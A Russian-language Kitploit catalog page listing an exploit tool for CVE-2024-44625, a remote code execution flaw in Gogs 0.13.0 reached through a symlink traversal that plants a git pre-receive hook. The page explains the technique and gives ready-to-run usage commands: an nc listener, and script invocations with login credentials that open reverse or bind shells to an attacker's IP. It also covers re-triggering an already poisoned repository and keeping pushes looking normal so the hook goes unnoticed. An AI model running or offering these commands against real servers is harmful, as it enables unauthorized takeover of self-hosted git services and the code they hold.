Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-44625-Gogs-RCE-0.13.0 — Эксплойт для CVE-2024-44625 в Gogs 0.13.0, обеспечивающий удалённое выполнение кода через переход по символической ссылке для создания git-хука, с режимами reverse и bind shell. | Kitploit
Инструменты/GitHubGitHub/batj44/cve-2024-44625-gogs-rce-0.13.0
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubbatj44/cve-2024-44625-gogs-rce-0.13.0

CVE-2024-44625-Gogs-RCE-0.13.0

Эксплойт для CVE-2024-44625 в Gogs 0.13.0, обеспечивающий удалённое выполнение кода через переход по символической ссылке для создания git-хука, с режимами reverse и bind shell.

Репозиторий
1 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-44625 и Gogs-RCE-0.13.0

Проверено на Gogs эпохи 0.13.0 за обратным прокси. Примитив: переход по символической ссылке в веб-редакторе на ОТСУТСТВУЮЩИЙ .git/hooks/pre-receive создаёт этот файл (исполняемый). Каждый последующий push в репозиторий выполняет его.

Использование:

Обратная оболочка (сначала запустите слушатель: nc -lvnp 4444)

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost <YOUR_IP> --lport 4444

Привязанная оболочка (затем подключитесь: nc )

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode bind --bind-port 5555

Повторный запуск существующего хука (репозиторий уже отравлен) без повторной установки:

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3

Примечания:

  • Репозиторий — это НОВЫЙ одноразовый, созданный под --owner (по умолчанию — --user).
  • Путь к хуку определяется из --root (по умолчанию /data/git/gogs-repositories, Docker).
  • exit 0 сохраняет push-и обычными (без ошибки "hook declined"). """
Скачать инструмент